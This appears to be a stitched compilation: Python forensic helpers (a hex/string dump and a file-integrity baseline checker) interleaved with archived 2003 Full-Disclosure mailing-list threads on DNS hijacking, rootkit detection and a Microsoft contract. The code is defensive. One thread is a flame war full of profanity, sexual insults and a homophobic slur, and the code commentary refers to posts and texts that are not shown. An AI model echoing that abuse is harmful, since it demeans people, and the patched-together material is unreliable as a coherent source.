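        hex_row = " ".join(f"{b:02x}" for b in chunk)
        ascii_row = " ".join(str(b) if b < 0x80 else "*" for b in chunk)
        symbol_row = " ".join(chr(b) if 0x20 <= b < 0x7f else "*" for b in chunk)
        rows.append((off, hex_row, ascii_row, symbol_row))
    return rows


def render(data: bytes, width: int = 16) -> str:
    """Text form of triple_dump(), one labelled line per row, blank line between groups."""
    lines = []
    for off, hx, asc, sym in triple_dump(data, width):
        lines.append(f"{off:08x}  HEX     {hx}")
        lines.append(f"{off:08x}  ASCII   {asc}")
        lines.append(f"{off:08x}  SYMBOL  {sym}")
        lines.append("")
    return "\n".join(lines)


def find_strings(data: bytes, min_len: int = 4) -> list:
    """(offset, text) for every run of at least `min_len` printable ASCII bytes."""
    found, run, start = [], bytearray(), 0
    for i, b in enumerate(data):
        if 0x20 <= b < 0x7f:
            if not run:
                start = i
            run.append(b)
        else:
            if len(run) >= min_len:
                found.append((start, run.decode("ascii")))
            run = bytearray()
    if len(run) >= min_len:
        found.append((start, run.decode("ascii")))
    return found


# Constructed sample: the first two 16-byte rows quoted in the post (0x05 read
# from the decimal row where the hex row shows a bare "5").
SAMPLE = bytes.fromhex(
    "ff872292000a0a2873796e632d312efd"
    "ff6fff30313b20616e64790549276d20"
)

if __name__ == "__main__":
    print(render(SAMPLE))
    for off, text in find_strings(SAMPLE):
        print(f"{off:5d}: {text!r}")
```

The scan recovers the fragments the poster read by eye ("(sync-1.", "01; andy", "I'm ") with their offsets, which is the starting point for lining up the gaps against the Sophos text.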
Re: [Full-Disclosure] Mystery DNS Changes
On Wednesday 01 October 2003 21:19, Hansen, Kevin wrote: We have seen multiple instances where DHCP enabled workstations have had their DNS reconfigured to point to two of the three addresses listed below. Can anyone else confirm this? Incidents.org is reporting an increase in port 53 traffic over the last two days. Are we looking at the precursor to the next worm? 216.127.92.38 69.57.146.14 69.57.147.175 -KJH How bout asking [EMAIL PROTECTED] You likely have some spy/ad/pay ware on client machines. See lop.com and others. There's crap traffic on port 53 all the time, I get speedera ping-like traffic on my port 53 several times a day. It's a verifiable swarm but no one at att, verio, uunet, whatever seem to care. My cable ISP told me I could start legal action. Yeah right. This is probably a common occurrence. I think you're mixing up two different issues here. Dan
Re: [Full-Disclosure] Strange behavior in Windows 98 and 2000
2000 and XP boxes lose TCP/IP communication and, after a reboot, they work again. Win XP tries to push itself as being the authoritative server of its own host name by attempting to transfer its zone to the (local) dns server, doesn't it? Erratic behaviour is always a good way to break the thing. I rarely use WinXP, but did note that it behaves like that. Dunno about W2k. HTH Dan
Re: [Full-Disclosure] Rootkit
On Saturday 27 September 2003 00:26, David Hane wrote: I already run my own database of MD5 checksums on all system files. That's how I know what files were affected. What I would like is maybe a listing of the files installed and what directories they went into for the various rootkits. Guess it's too late, but try something like integrit next time. Still timestamp should help. Obviously the names of the files that were installed are meaningless. So all I would have to work with would maybe be file sizes, signature text in the files (as you mentioned), and the directories into which they were installed. Unless someone can suggest something else. Like maybe a MD5 database of known hacked programs. Timestamp. You must be able to get the time at which things occurred. If it might have been messed with look at inode numbers as well. An MD5 database of hacked programs would be like a hash db on existing insect species where about one quarter of them are known and mutations abound. Actually that's not a bad idea, in theory. How feasible would a searchable database of the most common hacked files be? For instance if a hacked version of ps is routinely installed by several rootkits could we then search that database and compare the MD5 signatures to list other files routinely used in conjunction with that app? I know it would be far from accurate but could it be useful? Bad idea. Exploits will easily vary. It's like anti virus databases, always too late anyway. Worry about what's on your plate now first. I also think that if you think you have various rootkits you should backup everything (the evidence) and reinstall the whole lot. Then look at the evidence. Compare it against older backups. Something will pop up. Also strings and hexdump are helpful. HTH, just IMHO Dan
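A baseline-and-verify check of the kind the thread above discusses (a checksum database over system files, backed by timestamps and inode numbers), as an added example rather than the poster's setup or integrit itself. The scenario in `demo()` is constructed: a same-size replacement of bin/ps is renamed into place and its mtime touched back, which the hash, the inode and ctime still expose. SHA-256 is used in place of the MD5 on the page because MD5 collisions are cheap to produce.

```python
"""File integrity baseline: hash + size + mtime + ctime + inode per file,
then a verify pass that lists exactly which fields changed. Added example."""
import hashlib
import os
import tempfile


def fingerprint(path: str) -> dict:
    """Hash and the metadata the thread talks about. mtime can be reset by an
    intruder with touch/utime; ctime and the inode number cannot be set from
    userland, so a file replaced via rename still stands out."""
    st = os.lstat(path)
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return {"hash": h.hexdigest(), "size": st.st_size,
            "mtime_ns": st.st_mtime_ns, "ctime_ns": st.st_ctime_ns,
            "inode": st.st_ino}


def baseline(root: str) -> dict:
    """Fingerprint every regular file under root, keyed by relative path."""
    db = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            db[os.path.relpath(path, root)] = fingerprint(path)
    return db


def verify(root: str, db: dict) -> dict:
    """Compare the current tree against a saved baseline.
    Returns {"modified": {relpath: [changed fields]}, "added": [...], "removed": [...]}."""
    current = baseline(root)
    report = {"modified": {}, "added": sorted(set(current) - set(db)), "removed": []}
    for rel, old in db.items():
        new = current.get(rel)
        if new is None:
            report["removed"].append(rel)
            continue
        changed = sorted(k for k in old if old[k] != new[k])
        if changed:
            report["modified"][rel] = changed
    return report


def demo() -> dict:
    """Constructed scenario: baseline a tree, replace bin/ps with a same-size
    file via rename (new inode), touch its mtime back, drop in a stray file."""
    with tempfile.TemporaryDirectory() as root:
        bin_dir = os.path.join(root, "bin")
        os.mkdir(bin_dir)
        ps = os.path.join(bin_dir, "ps")
        with open(ps, "wb") as f:
            f.write(b"#!/bin/sh\necho original ps\n")
        db = baseline(root)  # this is what you would store off-host
        old_mtime_ns = os.stat(ps).st_mtime_ns
        # Replacement written to a fresh inode, then renamed over the original.
        tmp = ps + ".new"
        with open(tmp, "wb") as f:
            f.write(b"#!/bin/sh\necho trojaned ps\n")  # same length on purpose
        os.replace(tmp, ps)
        os.utime(ps, ns=(old_mtime_ns, old_mtime_ns))  # mtime "touched back"
        with open(os.path.join(root, "extra"), "wb") as f:
            f.write(b"x")
        return verify(root, db)


if __name__ == "__main__":
    for key, val in demo().items():
        print(key, val)
```

In the demo report, bin/ps shows hash, inode and ctime_ns as changed while size and mtime_ns do not, which is the point of recording more than the checksum.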
[Full-Disclosure] Re:
Are there list mods here? I'm almost scared to ask based on what I've been reading here lately. On Friday, July 18, 2003, at 06:15 PM, Anthony Aykut wrote: How come this list filters/stops/bans profanity, but fails to squeeze out puss like you?? Just goes to show what a fucking joke this list is, doesn't it?? - Original Message - LOL From: Anthony Aykut [EMAIL PROTECTED] To: Donnie Weiner [EMAIL PROTECTED] Subject: RE: RE: [Full-Disclosure] TO: Anthony Aykut Date: 18 Jul 2003 19:49:07 - I am guessing yuo can't even suck my dad's dick you fucking limp retard cunt. If think you can treat everybody like your favourite bitch you arrogant fuck, you did hit send on your mail to the wrong person. You l33t? Don't make me laugh, ass-boy. The only person tripping is, you. I cream my pants every fucking day reading this list, which is turned now into a retard circus due to lame-ass, would be funny, know-it-all mother fuckers like you. Donnie Wiener, the stupid kiddie-fucker won't even reveal his real name. Shame on you - cannot even converse without making personal attacks. Do I take it too personal? Fuck yeah. The moment you put my name on this mail, you crossed the line you cunt. I probably get banned from this list now for writing this email, but who gives a flying fuck - this list is ruined anyways. By fucks like you. Bye FD. By Weiner, the ass-rammed, gay-boy. Go and run back to your mommy, she'll suck your dick any day. - Original Message - i ll change yar mom panties bettar :D is yuo who say to excuse morning_wood i must demand yuo for have such bad guilt trip From: Anthony Aykut [EMAIL PROTECTED] To: Donnie Weiner [EMAIL PROTECTED] CC: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] TO: Anthony Aykut Date: 18 Jul 2003 19:33:18 - Yawn, change the record. - Original Message - shutup yar dum. Christ almighty. 
For all your bickering, wit and inventiveness, if you people put the same energy and will into educating people or arguing in a civil manner over what you are not agreeing to, this list would be a much better place. Wood at least tries, even though some of you may or may not agree to what or how he is doing it. But no, of course you won't do that, you'll have to show off and be arrogant - because let's face it we just love oneupmanship and love to mock people. That way we can REALLY show them that we are better. Sad.
RE: [Full-Disclosure] Microsoft wins Homeland Security Bid ( Reuters)
So, customer demand, security and most-effective-software-to-do-the-job aside...I wonder what kind of deal Microsoft cut with the Government? I wonder who, if anyone, got bumped out? Anyone else catch the story on /. yesterday about the Munich deal? http://slashdot.org/article.pl?sid=03/07/15/1854215 Danny -Original Message- From: northern snowfall [mailto:[EMAIL PROTECTED] Sent: Wednesday, July 16, 2003 3:50 PM To: Brad Bemis Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Microsoft wins Homeland Security Bid ( Reuters) You are absolutely right! I will not argue this point at all. The only thing I will say is that product security is based on a process of evolution. My statement was intended to indicate that it is customer demand that drives the speed of that evolution. No. Customer demand should play the *least* part in security evolution. The *main* thing that security analysts and security developers should focus on are the capabilities of the opposition, whomever they may be. Your foe is not your customer, and if he is he will not lead you toward pleasant waters. Again, your thinking is dangerous. Don http://www.7f.no-ip.com/~north_